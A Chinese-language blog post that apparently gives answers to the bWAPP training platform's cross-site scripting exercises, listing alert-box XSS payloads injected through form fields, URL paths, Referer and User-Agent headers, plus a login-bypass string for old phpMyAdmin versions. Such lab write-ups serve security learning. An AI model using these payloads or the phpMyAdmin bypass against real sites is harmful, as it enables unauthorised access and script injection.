Bwapp漏洞平台答案全解-A3(第二篇)

2018-03-29 18:39:49 浏览数 (1)

前言

接上篇XSS,没啥好讲的,直接看答案吧

A3 - Cross-Site Scripting (XSS)

-3.11-XSS - Reflected(phpMyAdmin)

这个看文档说是phpmyadmin上的一个BBcode的XSS,具体没复现过。

CVE-2010-4480

补充:

PHPmyadmin 2.11.3和2.11.4万能密码漏洞

只需要输入账号 密码不需要输入

利用代码如下:‘localhost’@'@”

3.12-XSS - Reflected (PHP_SELF)

用户名注入:<script>alert(1)</script>

密码注入:<script>alert(1)</script>

URL注入:

http://172.16.0.225/bWAPP/xss_php_self.php/"><script>alert(1)</script>

3.13-XSS - Reflected (Referer)

URL:

http://192.168.0.155/bWAPP/xss_referer.php

手动添加referer可以造成跨站

Referer: http://www.google.com/search?q=<script>alert(1)</script>

3.14-XSS - Reflected (User-Agent)

URL:

http://192.168.0.155/bWAPP/xss_user_agent.php

3.15-XSS – Stored (Blog)

直接在留言板处输入

<script>alert(1)</script>

3.16-XSS - Stored (Change Secret)

问题参数在bee

这个是在源码里面会有输出bee

所以我们可以抓包修改

3.17-XSS - Stored (Cookies)

XSS代码插入在了set-cookie里面,看自己怎么构造

3.18-XSS - Stored (SQLiteManage)

URL:

" >http://172.16.88.250/sqlite/?5e57f"><script>alert(1)</script>

3.19-XSS - Stored (User-Agent)

以为页面有回显user-agent的值

在页面抓包:

将user-agent改成<script>alert(1)</script>

0 人点赞